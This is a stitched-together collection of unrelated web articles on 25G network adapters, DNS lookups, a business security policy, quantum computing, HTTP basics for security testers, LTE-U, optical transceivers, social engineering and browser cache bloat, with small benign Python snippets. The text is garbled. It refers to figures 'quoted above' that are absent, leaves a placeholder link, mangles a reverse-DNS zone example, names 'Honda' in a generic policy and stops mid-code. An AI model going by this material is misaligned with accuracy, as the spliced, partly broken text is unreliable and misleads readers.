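As a rough sanity check on why a PCIe 3.0 x8 slot is a sensible match for a dual-port 25G adapter, the back-of-the-envelope calculation below uses the per-lane figure quoted above and ignores protocol overhead, so treat the result as approximate.

```python
# Approximate check: can a PCIe 3.0 x8 slot feed a dual-port 25GbE NIC?
pcie3_lane_mb_s = 984.625        # usable MB/s per PCIe 3.0 lane (128b/130b encoding)
lanes = 8
slot_gbit_s = pcie3_lane_mb_s * lanes * 8 / 1000   # roughly 63 Gbit/s

nic_ports = 2
nic_gbit_s = nic_ports * 25                        # 50 Gbit/s line rate

print(f"PCIe 3.0 x8 ~= {slot_gbit_s:.1f} Gbit/s, NIC needs {nic_gbit_s} Gbit/s")
print("Sufficient" if slot_gbit_s >= nic_gbit_s else "Insufficient")
```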
To fully realize the server adapter’s function, the card’s controller chip is crucial, for its quality determines the stability and speed of the card. Large manufacturers choose Intel chipsets, which provide a reliable guarantee of high quality, stability, and compatibility for NICs. The FS PCI Express x8 dual-port SFP28 25G server adapter is based on the Intel XXV710 chipset and is also compatible with a PCIe x16 slot. The server adapter can meet the demands of next-generation data centers by providing unmatched features for both server and network virtualization, as well as reliable performance in flexible LAN and SAN networks.
With 2.5X faster performance, 100% better performance-per-dollar, backward compatibility plus a future-proof upgrade path to 100G, the new 25G systems deliver best-in-class TCO for today's agile data centers. The majority of server vendors are offering 25 Gigabit Ethernet NICs as the standard I/O option in their latest 2-socket and 4-socket servers. FS is ready to embrace the 25G/100G technology with a series of 25G products ranging from optical transceivers, network switches to fiber optic cassettes.
Tanya Valdez is a Technical Writer at Constellix. She makes the information-transfer material digestible through her own transfer of information to our customers and readers. Connect with her on LinkedIn.
Domain name system (DNS) lookups are how end users obtain the websites they search for. It is the way DNS services resolve end-user queries and acquire information related to domains.
A DNS lookup is initiated when an end user enters a domain name and the resolver translates it into the corresponding identifier—the IP address. To understand this process, it is best to start with the basics of DNS—what it is, how it works, and what a query journey looks like. For a detailed explanation, visit our What is DNS resource page.
A query journey includes all of the steps taken to translate the entered domain name to an IP address. When a person enters a web address into their browser, the search is initiated. The query first stops at the recursive server which contacts a series of authoritative servers to gain all of the information that it needs to translate it into language that a machine can read. Then, it returns the IP address related to the domain that was initially searched. There are instances in which the path may change or the domain is unreachable, but as a whole, that is the road most taken in query journeys.
For all of this to take place, the proper path needs to be established. In comes DNS records. DNS records set the rules and lay down the paths for the query to travel. They store all of the relevant information servers need to properly translate email addresses and domain names into meaningful numerical addresses to complete the DNS process.
There are two different types of DNS lookups: forward DNS and reverse DNS lookups.
Forward DNS (also known as a forward DNS lookup) is a request that is used to obtain an IP address by searching the domain. This follows the standard DNS query journey when the user types in a web page or sends an email and is provided with the related IP address.
This process allows an end client to translate a domain name or email address into the address of the device that would handle the server-side communication.
Reverse DNS is the exact opposite of forward DNS. It is a lookup request that is used to obtain the domain name related to an IP address. Reverse lookups are typically used by email servers to ensure that the servers they are receiving messages from are valid.
To complete this process, the mail server must have a pointer (PTR) record established. This type of record informs other mail servers that its IP address is authoritative for sending and receiving mail for its related domain.
The IP owner (typically the ISP or hosting provider for the particular email server) delegates a zone for the server that ends in “in-addr.arpa” with some preceding numbers. The numbers at the beginning of the zone are the server’s IP block with the octets reversed.
Example: The reverse DNS for the 192.168.1 class C would be “1.168.192.in-addr.arpa”. In this example, this reverse DNS zone would handle the reverse DNS for IPs 192.168.1.0 to 192.168.1.255. If the IP block is smaller than a class C, the zone might be “27/1.168.192.in-addr.arpa” or “0-184.108.40.206.in-addr.arpa”. The difference is the syntax.
For more information on reverse DNS, see our set-up tutorial.
DNS information related to a domain can be found by using DNS lookup commands. They can provide details such as nameservers, mail servers, and configured records.
A nameserver lookup, also known as an nslookup, allows you to locate the nameserver associated with a domain, along with any configured records. This information can be resolved using an IP address or a domain name as the search option. The command for an nslookup differs slightly across PC, Mac, and Linux. Using Windows 10, this is done through the command prompt and a Mac device uses the terminal. Linux users utilize dig, which is also a command line utility that allows users to locate domain information.
For a detailed look at how to run an nslookup, see our ….. resource.
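If you prefer to script these checks rather than run nslookup or dig by hand, Python's standard library can perform both forward and reverse lookups. The hostname below is only an example, and the reverse lookup will succeed only if a PTR record is configured.

```python
import socket

# Forward DNS: domain name -> IP address
ip = socket.gethostbyname("www.example.com")
print("A record:", ip)

# Reverse DNS: IP address -> domain name (requires a PTR record)
try:
    host, aliases, addresses = socket.gethostbyaddr(ip)
    print("PTR record:", host)
except socket.herror:
    print("No PTR record configured for", ip)
```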
While there are a few online tools that assist in retrieving DNS information, Constellix’s DNS Lookup Tool allows you to perform a search from any device, including cell phones and tablets. The lookup results can be shared and this has proven to be very useful for teams in troubleshooting domain configuration changes.
DNS lookups utilize DNS records to translate IP addresses and domain names or email addresses. There are two types of lookups: forward DNS and reverse DNS. Both resolve information related to the domain, depending on the search method. If you have a domain name or email address and need the IP address resolved, forward DNS is used to return the requested information. It is a functional part of all IP-based networks, including the internet. If you have an IP address and need to locate an email address or domain name, reverse DNS resolves this request.
If you care at all about your business’s security, you should at least have an overview idea of these 3 fundamentals: network security, desktop security and a security policy.
There are two overriding principles in security design:
1) The overall level of security protection is only as good as the lowest common denominator, as attackers will always find the weakest link.
2) Complexity is the enemy of security.
A security policy defines the simplest, lowest common denominator necessary to meet business security goals. In order to accomplish this objective, the following topics must be considered.
• Virus Protection
• System Penetration
• External hacking
• Theft of proprietary information
• Theft of transaction information
• Financial fraud
• Unauthorized insider access
• Denial of service (DoS)
• Web site vandalism
• Internal hacking
• Physical break-in and/or theft of computer equipment
With that, I would like to present, certainly not the end-all, but at least the fundamental elements of what an organization should consider having in place if it is to have even a prayer of addressing the above. So, submitted for your approval, we would like to share the elements of:
• A SECURITY POLICY
• NETWORK SECURITY
• DESKTOP SECURITY
• The security policy is not displayed on the Internet but is used to direct and guide development of web sites in order to create a safe user environment.
• For all transmissions between clients (i.e. web browser) to web server through the Internet containing ‘sensitive’ data use a Secured Sockets Layer (SSL) connection.
• For all transmissions between the web server (i.e. IIS) and the database containing ‘sensitive’ data use approved encryption.
• For the storage (i.e. persistence) of ‘sensitive’ data within Database Management Systems (e.g. Microsoft SQL Server) use approved encryption unless otherwise instructed.
• For the storage (i.e. persistence) of Microsoft OS level files use Microsoft security guidelines / best practices (e.g. on NT servers running IIS use NTFS not FAT). Always set file access privileges within NTFS and IIS to ensure optimal security (optimal is defined as allowing access to only users and applications that are authorized and entitled), unless otherwise instructed.
• For all transmissions containing ‘sensitive’ data between the web server and other servers within local control use approved encryption unless otherwise instructed.
• For user login authentication use the secure authentication mechanisms, e.g., two factor, certificate, or credentialed mechanisms.
• Monitor the availability of security related patches and updates to products that pose security risk (e.g. IIS patches to security related ‘holes’), and apply in an expeditious manner.
• Avoid use of system default values (out of box settings) within publicly available software, absolute path names to files, and sample code that encourage breaches in security.
• Check Computer Emergency Response Team (CERT) (www.cert.org) and System Administration, Networking, and Security (SANS) Institute (www.sans.org) security web sites on a prescribed basis for warnings, announcements, and updates as they become available.
• Perform regular frequent system backups.
• Implement strict review, testing, change control and documentation processes as defined by your organization. These processes should surround all changes (e.g., home grown CGI scripts may inadvertently open a door to an intruder).
Physical Connection and Web Servers
• When ‘sensitive’ information is passed between the users on the Internet and the web server use an SSL connection. Encrypt all web pages that display user-specific and financial information using 128-bit SSL. Use built-in browser SSL features and server-side SSL certificates provided by the hosting facility.
• Web servers, database servers and application servers must be physically located only at secure hosting facilities compliant to organizational standards.
• Files passed between web servers and the organization will be through private lines between and the hosting facility.
• Use of firewalls (and a DMZ?) is required to isolate commerce servers from other merchant networks and systems.
• Incorporate the organization approved fraud detection metrics on web server (assuming credit card usage).
Database Encryption for Sensitive Data
• ‘Sensitive’ information will be encrypted in the database.
• Use an organization-authorized third-party encryption component to encrypt and decrypt all ‘sensitive’ data fields in the organization business databases.
• Use stored procedures for accessing data in the database, and ensure that access permissions are correct. Only applications that have proper Windows authentication permissions are entitled to run stored procedures and have access to the Relational Database Management System servers.
• Store ‘sensitive’ information like credit card numbers on back-end machines that are better protected than the commerce servers.
• When sending email confirmation of orders, indications of shipping status, etc. mask all confidential information like credit card numbers (to prevent unauthorized use).
• Use of basic entitlement mechanisms for company directory access to ensure the user being properly authenticated. Redirect users that are not authenticated to the login.
• After login authentication, require Web users to further authenticate themselves by entering additional personal information as directed by the organization (for example, the organization finance project users must enter their Account Number and SSN to access their account information).
• Users will only be shown account information for which they’ve provided adequate authentication. Also, the application will enforce business rules on various levels of account access based on the account status.
• COM components must use Microsoft operating system (e.g. NT / Windows 2000) authentication facilities along with proper permissions and rules.
Firewall and Router screening
Ensure that firewall/router screening is in place to restrict access to only necessary services, e.g., HTTP, SSL.
An intrusion detection policy can help find those attackers that are able to subvert the web server. This policy will help Honda’s Legal Department in prosecuting these attackers.
• Ensure that mechanisms are in place to identify apparent unusual accesses to the systems
• Provide alerts to the administrator in the case of unusual accesses to the systems.
IP reputation is a service that enables the filtering of messages based on the sending server’s IP address. The types of messages sent from that IP address are tracked and stored so your perimeter firewall knows whether the sending server is a likely source of spam. There are three functions of IP reputation: blacklist, graylist, and whitelist.
ISP Reviews and Audits
ISPs must cooperate with Honda’s independent reviewers (internal and external auditors, risk assessors, etc.). If this is not possible, the ISP must provide a recent SAS 70 evaluation to the organization, and a contract requiring the ISP to share any economic loss from a security breach is required.
Find a program that examines .exe, .dll, and .ocx files on your computer and matches the data against a file signatures engine to determine whether you are running unpatched software programs. It then provides help in patching the vulnerabilities that are identified. Example link: https://psi.secunia.com/
No software to install. Just change your DNS settings to use the OpenDNS servers (208.67.222.222 and 208.67.220.220) to get valuable security features: content filtering, adult site blocking, phishing and malware blocking, and protection against DNS rebinding attacks. Example link: http://www.opendns.com
The free browser plugin (Internet Explorer and Firefox) covers the growing data security hole between your firewall and anti-virus programs. It provides an aggressive, color-coded early warning system for drive-by malware attacks. Example link: http://www.hautesecure.com
A program is needed to intelligently monitor Windows machines for remote botnet C&C (command and control) commands. These can include commands to turn the zombie machine into a spam relay; launch denial-of-service attacks; or host malicious Web sites for phishing attacks. Example link: http://www.trendsecure.com/portal/en-US/tools/security_tools/rubotted
A program that detects and removes stealthy rootkits used by hackers to hide malicious software from security programs. Example link: http://free.grisoft.com/doc/39798/us/frt/0
Network security isn’t something you can cover in one sitting but hopefully this can guide you in the right way. At Affant Network Services, we are constantly looking to keep you up to date with the latest security tips and tricks. To learn more about this topic or to see how you can get started contact us today at 714.338.7100.
Founding and leading technology-oriented service organizations since 1988. Specializes in Public speaking relating to Business Management, Entrepreneurship, Communication Network Management, Network Security, Managing your Team, and IP Telephony /VoIP / IP Communication.
Quantum Engineering Required to Overcome Challenges to Make Quantum Computing a Reality
(MIT.edu) Quantum systems are not easy to manage, thanks to two related challenges. Both science and engineering will be required to overcome these challenges to make quantum computing a reality.
The first problem is that a qubit’s superposition state is highly sensitive. The second challenge lies in controlling the qubit to perform logical functions, often achieved through a finely tuned pulse of electromagnetic radiation.
William Oliver is an associate professor in MIT’s Department of Electrical Engineering and Computer Science, a Lincoln Laboratory Fellow, and the director of the MIT Center for Quantum Engineering. The computers Oliver engineers use qubits composed of superconducting aluminum circuits chilled close to absolute zero. The system acts as an anharmonic oscillator with two energy states, corresponding to 0 and 1, as current flows through the circuit one way or the other. These superconducting qubits are relatively large, about one tenth of a millimeter along each edge.
Oliver is constantly fighting decoherence, seeking new ways to protect the qubits from environmental noise. His research mission is to iron out these technological kinks that could enable the fabrication of reliable superconducting quantum computers. “I like to do fundamental research, but I like to do it in a way that’s practical and scalable,” Oliver says. “Quantum engineering bridges quantum science and conventional engineering and both will be required to make quantum computing a reality.”
Another solution to the challenge of manipulating qubits while protecting them against decoherence is a trapped ion quantum computer, which uses individual atoms — and their natural quantum mechanical behavior — as qubits. Atoms make for simpler qubits than supercooled circuits, according to John Chiaverini, a researcher at the MIT Lincoln Laboratory’s Quantum Information and Integrated Nanosystems Group. “Luckily, I don’t have to engineer the qubits themselves,” he says. “Nature gives me these really nice qubits. But the key is engineering the system and getting ahold of those things.”
Chiaverini notes that the engineering challenges facing trapped ion quantum computers generally relate to qubit control rather than preventing decoherence.
Oliver and Chiaverini agree that quantum information processing will hit the commercial market only gradually in the coming years and decades as the science and engineering advance.
“Quantum computing has been the future for several years,” Chiaverini says. But now the technology appears to be reaching an inflection point, shifting from solely a scientific problem to a joint science and engineering one — “quantum engineering” — a shift aided in part by Chiaverini, Oliver, and dozens of other researchers at MIT’s Center for Quantum Engineering (CQE) and elsewhere.
HTTP is a ubiquitous protocol and is one of the cornerstones of the web. If you are a newcomer to web application security, a sound knowledge of the HTTP protocol will make your life easier when interpreting findings by automated security tools, and it’s a necessity if you want to take such findings further with manual testing. What follows is a web security-focused introduction to the HTTP protocol to help you get started.
HTTP is a message-based (request, response), stateless protocol comprised of headers (key-value pairs) and an optional body. Three versions of HTTP have been released so far – HTTP/1.0 (released in 1996, rare usage), HTTP/1.1 (released in 1997, wide usage), and HTTP/2 (released in 2015, increasing usage).
The HTTP protocol works over the Transmission Control Protocol (TCP). TCP is one of the core protocols within the Internet protocol suite and it provides a reliable, ordered, and error-checked delivery of a stream of data, making it ideal for HTTP. The default port for HTTP is 80, or 443 if you’re using HTTPS (an extension of HTTP over TLS).
HTTP is a line-based protocol, meaning that each header is represented on its own line, with each line ending in a Carriage Return Line Feed (CRLF) with a blank line separating the head from the optional body of the request or response.
Up to HTTP/1.1, HTTP was a text-based protocol, however, with HTTP/2 this has changed. HTTP/2, unlike its predecessors, is a binary protocol with most implementations requiring TLS encryption. It’s worth noting that for the vast majority of cases (and certainly, for this article) interacting with the HTTP/2 protocol won’t be any different. It’s also worth mentioning that HTTP/1.1 isn’t going away anytime soon, and it’s still early days for HTTP/2 (as such, HTTP/1.1 will be referenced throughout this article) even though it is supported by all major web servers such as Apache and NGINX, as well as modern browsers such as Google Chrome, Firefox, and Internet Explorer.
In order to initiate an HTTP request, a client first establishes a TCP connection to a specified web server on a specified port (80 or 443 by default).
The request starts with an initial line known as the request line, which contains a method (GET in the following example; more on this later), a URL (/, indicating the root of the host in the example below), and the HTTP version (HTTP/1.1 in the example below). We must also include a Host header to tell the server which host the request is intended for:
GET / HTTP/1.1
Host: www.example.com
The above is exactly what a web browser does when you type in http://www.example.com into its URL bar. If we wanted to get the contents of http://www.example.com/about.html, we would send the following request instead:
GET /about.html HTTP/1.1
Host: www.example.com
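To see that there is nothing more to this than plain text over TCP, the sketch below opens a connection to port 80 and sends the same request by hand. For HTTPS you would first wrap the socket using Python's ssl module.

```python
import socket

request = (
    "GET /about.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Connection: close\r\n"
    "\r\n"
)

with socket.create_connection(("www.example.com", 80)) as sock:
    sock.sendall(request.encode("ascii"))
    response = b""
    while chunk := sock.recv(4096):
        response += chunk

# Print only the status line, e.g. "HTTP/1.1 200 OK"
print(response.decode("iso-8859-1").split("\r\n")[0])
```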
HTTP Request Methods
The HTTP protocol defines a number of HTTP request methods (sometimes also referred to as verbs), which are used within HTTP requests to indicate to the server the desired action for a particular resource.
| Method | Description |
| --- | --- |
| GET | The GET method is used to retrieve a resource from a server. |
| POST | The POST method is used to submit data to a resource. |
| TRACE | The TRACE method is used to echo back anything sent by the client. This HTTP method is typically abused for reflected Cross-site Scripting attacks. |
| PATCH | The PATCH method is used to apply partial updates to a resource. |
| PUT | The PUT method is used to replace a resource. |
| HEAD | The HEAD method is used to retrieve a resource identical to that of a GET request, but without the response body. |
| DELETE | The DELETE method is used to delete the specified resource. |
| OPTIONS | The OPTIONS method is used to describe the supported HTTP methods for a resource. |
| CONNECT | The CONNECT method is used to establish a tunnel to the server specified by the target resource (used by HTTP proxies and HTTPS). |
On the server-side, an HTTP server listening on port 80 sends back an HTTP response to the client for what it has requested.
The HTTP response will contain a status line as the first line in the response, followed by the response. The status line indicates the version of the protocol, the status code (200 in the below example), and, usually, a description of that status code.
Additionally, the server’s HTTP response will typically also include response headers (
Content-Type in the below example) as well as an optional body (with a blank line separating the head of the response from the body).
HTTP/1.1 200 OK
Content-Type: text/html

<html>
...
</html>
Response Status Codes
HTTP response status codes are issued by the server within an HTTP response to let the client know what the status of the request is. Status codes are organized in the following categories.
| Status code group | Description |
| --- | --- |
| 1xx (Informational) | The request was received and the process is continuing. |
| 2xx (Success) | The request was successfully received, understood, and accepted. |
| 3xx (Redirection) | Further action needs to be taken in order to complete the request. |
| 4xx (Client Error) | The request contains bad syntax or cannot be fulfilled. |
| 5xx (Server Error) | The server failed to fulfill an apparently valid request. |
Some of the most relevant HTTP status codes for web application security testing are the following, however, a full list of status codes and their descriptions may be found here.
| Status code | Description |
| --- | --- |
| 200 OK | Indicates that the request has succeeded. |
| 301 Moved Permanently | Indicates that the requested resource has been permanently moved to the URL given in the Location header. |
| 302 Found (Temporary Redirect) | Indicates that the requested resource has been temporarily moved to the URL given in the Location header. |
| 400 Bad Request | Indicates that the server could not understand the request sent by the client, usually due to invalid syntax. |
| 401 Unauthorized | Indicates that the request could not be served due to insufficient authentication. |
| 403 Forbidden | Indicates that the server understood the request but refuses to authorize it. |
| 404 Not Found | Indicates that the server cannot find the requested resource. |
| 405 Method Not Allowed | Indicates that the request method is known by the server, but it is not allowed to be used with this resource. |
| 500 Internal Server Error | Indicates that the server encountered an unexpected condition that prevented it from fulfilling the request. |
The query string is defined using the question mark (
?) character after the URL within an HTTP request. The query string defines a series of key-value parameters separated by the ampersand (&) character:
GET /search?query=example&lang=en_US HTTP/1.1
Host: www.example.com
Query string parameters are one of the primary mechanisms that web applications use as user input. It’s, therefore, no surprise that most web application vulnerabilities arise from poorly handled user input within query string parameters.
URL encoding is a way to represent characters that cannot (or should not) be present within URLs to be represented safely within a URL. This allows encoding and decoding of characters that would otherwise cause problems or conflicts. The following are some examples of URL encoded characters:
- space: %20
- " (double quote): %22
- #: %23
- %: %25
- &: %26
- /: %2F
- ?: %3F
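If you need to check how a particular character or string will be percent-encoded, a quick way is to use Python's urllib, as in this short sketch.

```python
from urllib.parse import quote, unquote

# Encode a few individual characters
for ch in [" ", "&", "?", "/", "#", "=", "%"]:
    print(repr(ch), "->", quote(ch, safe=""))

# Decode a percent-encoded query string
print(unquote("query%3Dexample%26lang%3Den_US"))  # query=example&lang=en_US
```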
Since HTTP is a stateless protocol, cookies are a built-in mechanism to pass state data to the server. Typical examples included in cookies would be state information such as session identifiers and user preferences.
Cookies are crucial to security since they are widely used to store session information. This means that if an attacker can steal a user’s cookie (using attacks such as Cross-site Scripting, for example), in many web applications, this alone provides the attacker with all they need to impersonate that user.
Cookies are set by the server using the Set-Cookie HTTP response header. The browser then stores the cookie value and submits it with every request. This may also introduce vulnerabilities such as Cross-site Request Forgery. The cookie value may contain several values delimited by a semicolon (;). Additional security features around cookies include the Secure and HttpOnly flags and, more recently, the SameSite attribute, which restrict how and when the browser will transmit the cookie.
The HTTP protocol includes two types of built-in authentication mechanisms: Basic and Digest. While these two methods are built-in to HTTP, they are by no means the only authentication methods that can leverage HTTP, including NTLM, IWA (Integrated Windows Authentication, also known as Kerberos) and TLS client certificates. Additionally, form authentication, OAuth/OAuth2, SAML, JWT, and a whole host of other types of authentication options re-use features within HTTP such as form data or headers to authenticate a client.
Basic authentication is a built-in HTTP authentication method. When a client sends an HTTP request to a server that requires Basic authentication, the server will respond with a 401 HTTP response and a WWW-Authenticate header containing the value Basic. The client then submits a username and a password separated by a colon (:) and base64-encoded.
It’s important to note that Basic authentication sends credentials in the clear (without any form of encryption). This means that for Basic authentication alone is not secure, is highly susceptible even to the simplest man-in-the-middle attacks, and must be paired with the use of SSL/TLS.
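As an illustration, the sketch below builds such a Basic Authorization header by hand; the credentials are placeholders.

```python
import base64

username, password = "alice", "s3cret"          # placeholder credentials
token = base64.b64encode(f"{username}:{password}".encode("ascii")).decode("ascii")
headers = {"Authorization": f"Basic {token}"}

print(headers)  # {'Authorization': 'Basic YWxpY2U6czNjcmV0'}
```

Decoding the token is just as trivial as encoding it, which is exactly why Basic credentials must only ever travel over TLS.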
Digest authentication is also built-in to HTTP and, similarly to Basic authentication, it also returns a 401 HTTP response and a WWW-Authenticate header. In the case of Digest, the WWW-Authenticate header will contain the value digest together with a nonce (a number only used once) and a realm (which defines a URL path that may share the same credentials).
The HTTP client would then concatenate the supplied credentials together with the nonce and realm and produce an MD5 hash (first hash). The HTTP client then concatenates the HTTP method and the URI and generates an MD5 hash (second hash). The HTTP client then sends an Authorization header containing the realm, nonce, URI, and the response. The response is an MD5 sum of the two hashes combined.
While digest is a more secure alternative to Basic authentication, it is still highly advised for any authentication traffic to be transmitted over an HTTPS connection (SSL/TLS).
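For reference, this is roughly how the response value is computed in the simplest case (RFC 2617 without the qop extension); the realm, nonce, and credentials below are placeholders.

```python
import hashlib

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()

username, password = "alice", "s3cret"            # placeholder credentials
realm, nonce = "example.com", "dcd98b7102dd2f0e"  # values supplied by the server
method, uri = "GET", "/protected/"

ha1 = md5_hex(f"{username}:{realm}:{password}")   # first hash
ha2 = md5_hex(f"{method}:{uri}")                  # second hash
response = md5_hex(f"{ha1}:{nonce}:{ha2}")        # value sent in the Authorization header

print("response =", response)
```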
Form-based authentication is by far the most popular kind of authentication. It’s also not standard, in the sense that any application developer can dictate how an HTTP client should authenticate to an application.
Typically, the HTTP client would send a POST request to the server with the combination of a username and a password, after which, if successful, the server will respond with some kind of token. This token could be placed in a
Set-Cookie HTTP header, which would set a cookie in the browser (meaning that this value will henceforth be passed with each request to the server).
Such POST requests can be made by the browser by using an HTML form, for example:
<form name="login" action="https://login.example.com" method="post"> <input name="username" type="text"> <input name="password" type="password"> <input value="Login" type="submit"> </form>
This would send the data from the username and password input fields (field names are arbitrary) in a POST request to https://login.example.com. The POST request would be as follows:
POST / HTTP/1.1
Host: login.example.com

username=myusername&password=mypassword
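From a testing perspective, the same form login can be scripted. The sketch below assumes the hypothetical endpoint above and uses the third-party requests library to submit the form and capture any session cookie.

```python
import requests

session = requests.Session()
resp = session.post(
    "https://login.example.com",   # hypothetical login endpoint from the example above
    data={"username": "myusername", "password": "mypassword"},
)

print(resp.status_code)
print(session.cookies.get_dict())  # any session cookie returned via Set-Cookie
```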
HTTP headers are a way for an HTTP client and server to pass additional information within requests and responses. HTTP headers consist of a case-insensitive key (may not contain spaces), followed by a colon (
:), which is in turn followed by the header’s value (may contain spaces). The header is terminated by a CRLF (carriage return and line break).
It’s worth noting that while there are a number of standard HTTP headers, the HTTP protocol allows custom headers. Typically, custom headers start with an X- (for example, the X-Frame-Options header, and more); however, this is simply a widely adopted convention and not something enforced by the HTTP protocol. Note that some headers were originally custom headers but have since been adopted as a standard; for example, X-Content-Security-Policy is now Content-Security-Policy.
The following are some examples of commonly seen HTTP headers. A complete list of standard HTTP headers may be found here.
| Header | Description |
| --- | --- |
| Cache-Control | Used to specify directives for caching mechanisms in both requests and responses. |
| Connection | Indicates to the sender/receiver whether to keep the TCP connection open or close it. |
| Content-Type | Indicates the MIME type of the request/response body. |
| Content-Encoding | Indicates the type of encoding used for the request/response body. |
| Content-Length | Indicates the size in bytes of the request/response body. |
| Cookie | Contains cookie values, which were set using the Set-Cookie header. |
| Host | Contains the hostname of the URL being requested. This is a required header in HTTP/1.1 and it is important since the same server may serve different sites based on this header. This header is also important to keep in mind when defending against host header attacks. |
| Referer | Indicates to the server the page from which a link was clicked. The header was misspelled in the original specification and has remained so instead of being changed to Referrer. |
| Authorization | Contains the authentication method together with credentials. |
| User-Agent | Contains a string to identify the client (browser or another tool) that is making the request. |
| Accept | Indicates to the server what content MIME types it will accept. |
| Accept-Encoding | Indicates to the server what types of encoding it will accept. |
| Set-Cookie | Sets a cookie in the browser that will later be submitted with requests. |
| Server | Indicates the type and version of the server. This information could be useful for attackers. |
Conclusion and Further Reading
This sums-up some useful basics of the HTTP protocol that should get you up to speed with the terminology surrounding HTTP. Now that you’ve covered the basics, you should be able to understand the reports containing HTTP requests, responses, and other HTTP attributes, which means the next time you generate an Acunetix Developer Report, you should be sorted.
If you want to read more about HTTP security, we recommend you to have a look at our SSL/TLS basics series that includes the explanation of HTTPS, public keys, and SSL certificates, our article on HTTP Strict Transport Security and HSTS headers, our article about Sameorigin, as well as our article about clickjacking. You can also read the detailed description of the content security policy (CSP) HTTP security header by the Mozilla foundation.
March 17, 2017// News
Faster Cellular Signals Could Mean Slower Wi-Fi
Wireless companies will soon be transmitting data in the same part of the public airwaves that’s used by Wi-Fi. Dubbed LTE-U, the technology will give carriers more spectrum to play with, which should lead to faster speeds for their customers. However, those cellphone signals may interfere with Wi-Fi transmissions.
Vice President of Technology Policy at CableLabs, Rob Alderfer, commented on the move in a San Jose Mercury News article.
As the leading innovation and R&D lab for the cable industry, CableLabs creates global impact through its member companies around the world and its subsidiary, Kyrio. With a state-of-the art research and innovation facility and collaborative ecosystem with thousands of vendors, CableLabs delivers impactful network technologies for the entire industry.
An optical transceiver can best be described as a device that converts high-speed data from a cable source to an optical signal for communication over optical fiber. Optical transceivers are used to upgrade communications networks to handle broadband, to upgrade data center networks so they can manage traffic at higher speeds, and to implement the backbone networks for mobile communications.
For transceivers that plug into Gigabit Ethernet and link to a fiber optic network, the Gigabit Interface Converter (GBIC) is the standard, and SFP stands for small form-factor pluggable transceiver. GBIC modules operate as input and output transceivers and are linked with the fiber optic network, generally through optic patch cords. GBIC transceivers are deemed ideal for interconnections in Gigabit Ethernet and switching environments. The converters are intended for high-performance, continuous interactions that require Gigabit Ethernet or Fibre Channel interconnections. With SFP, users are able to create connections using multimode or single-mode fiber optic ports along with copper wiring.
The GBIC transceiver and the Cisco SFP offer companies the opportunity to set up a Fibre Channel and Gigabit Ethernet connection effortlessly within their network. Common Cisco transceivers include the Cisco GLC-SX-MM, GLC-T, GLC-LH-SM, GLC-ZX-SM, and many more. There are also 155M/622M/1.25G/2.125G/4.25G/8G/10G SFP optical transceivers, among which 155M and 1.25G are the most widely used on the market.
GBIC, SFP, SFP+, and 1×9 form factors cover products from low rates up to 10G and are fully compatible with equipment from the mainstream global vendors. SFP+ module technology is becoming mature, with demand on a rising trend. The 10G optical module went through the development of 300-pin, XENPAK, X2, and XFP form factors, ultimately achieving the transmission of 10G signals in the same size as SFP, and this is SFP+. SFP+, by virtue of its small size and low cost, meets the high-density requirements that devices place on optical modules. Since 2010, it has replaced XFP and become the mainstream in the 10G market.
SFP+ modules support digital diagnostics and monitoring functions, which are accessed through a 2-wire serial bus and provide calibrated, absolute real-time measurements of the laser bias current, transmitted optical power, received optical power, internal transceiver temperature, and supply voltage. Digital diagnostic functionality allows telecommunication and data communications companies to implement reliable performance monitoring of the optical link in an accurate and cost-effective way.
The driving forces behind the optical transceiver market relate to the increased traffic coming from the Internet. The optical transceiver market is intensely competitive. There is increasing demand for optical transceivers as communications markets grow in response to greater use of smartphones and more Internet transmission of data. The global optical transceiver market will grow to $6.7 billion by 2019, driven by the availability of 100 Gbps devices and the vast increases in Internet data traffic.
A palette of pluggable optical transceivers in GBIC, SFP, XFP, SFP+, X2, and CFP form factors is available at FiberStore. These are able to accommodate a wide range of link spans. The 10Gbps optical transceivers can be used in telecom and datacom (SONET/SDH/DWDM/Gigabit Ethernet) applications to change an electrical signal into an optical signal and vice versa.
Social engineering is a new name for an old con-artist trick. In this scam, a fraudster tries to gain your confidence by convincing you they are someone they are not, in order to get personal information from you.
What to Look For
These con artists can approach you by phone, email, text or social media. Here are some of their usual tricks:
- Claim to be a friend or family member in trouble
- Pretend to be a company threatening to shut down an account or service
- Pretend to be a company with a great discount offer or verifying account information
- Claim to be a collection agent working on behalf of a government agency or company
How to Help Protect Yourself
You can help protect yourself from social engineering by remembering these things:
- Be skeptical.
- Only give out information if you made the call to a number you know is right.
- If you think it’s a scam, hang up or delete the message. And don’t try to outsmart the bad guy by intentionally giving out wrong information. Just hang up. If you want to see if it was a real call or offer, contact the company by using information published on the real company website.
- Do not click on a link provided by an email or text message.
If you think a caller is trying to scam you, hang up. If you get a suspicious email or text, do not reply. If you suspect you are a target of fraud on your AT&T mobile phone account, you can report it to our Fraud team here. If you suspect fraud on another account, call the customer service number on your bill for help.
To find out more about reporting fraud, check out our Resources page.
Francesco Giarletta, CEO of Avanite, examines the potential security issues that simple web browsing data can cause and how web data bloat can be reduced
Whenever a user visits a website, data is created, downloaded, and stored. Some of this data is useful; it enables us to get the rich browsing experience we expect from the sites we visit. But as web sites and web applications become increasingly connected and complex the amount of browsing data also grows, quickly reaching a point where computer performance is impacted. What’s more, that data in browsing databases can include highly sensitive information putting organizations security at risk.
Of course, the issue of web data is as old as the internet itself, so it would be perfectly reasonable to question why this is now an issue. So how, and why, has the web browsing data problem evolved into not only a potential risk to IT performance but also a threat to organisations' privacy?
Inconvenience to impacting performance
While web data has always been a potential inconvenience to users and organisations it started to become a bigger problem when Microsoft introduced Windows 8.0 and Internet Explorer 10. At this point the computing behemoth introduced the webcachev01.dat database, a central store for all web data, such as cookies and browsing history. In addition to acting as a central data repository for Microsoft browsers, it also collects data from any application which uses the WinInet subsystem for internet communications, such as Windows store apps and Windows Explorer.
The database spawns at 32MB and as users use the system it grows with new data. Files of multiple Gigabytes are not uncommon, so the capacity to store all that data can directly impact user experience, with problems such as prolonged log-on times, while also utilising a growing amount of IT infrastructure resource, and associated costs.
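To get a feel for how large these databases have become in your own environment, you can simply measure WebCacheV01.dat across the user profiles on a machine. The sketch below is a read-only check for a single Windows system and assumes the default profile and cache locations.

```python
from pathlib import Path

# Default location of the WebCache database inside each Windows user profile
relative_path = "AppData/Local/Microsoft/Windows/WebCache/WebCacheV01.dat"

total_mb = 0.0
for profile in Path(r"C:\Users").iterdir():
    db = profile / relative_path
    if db.is_file():
        size_mb = db.stat().st_size / (1024 * 1024)
        total_mb += size_mb
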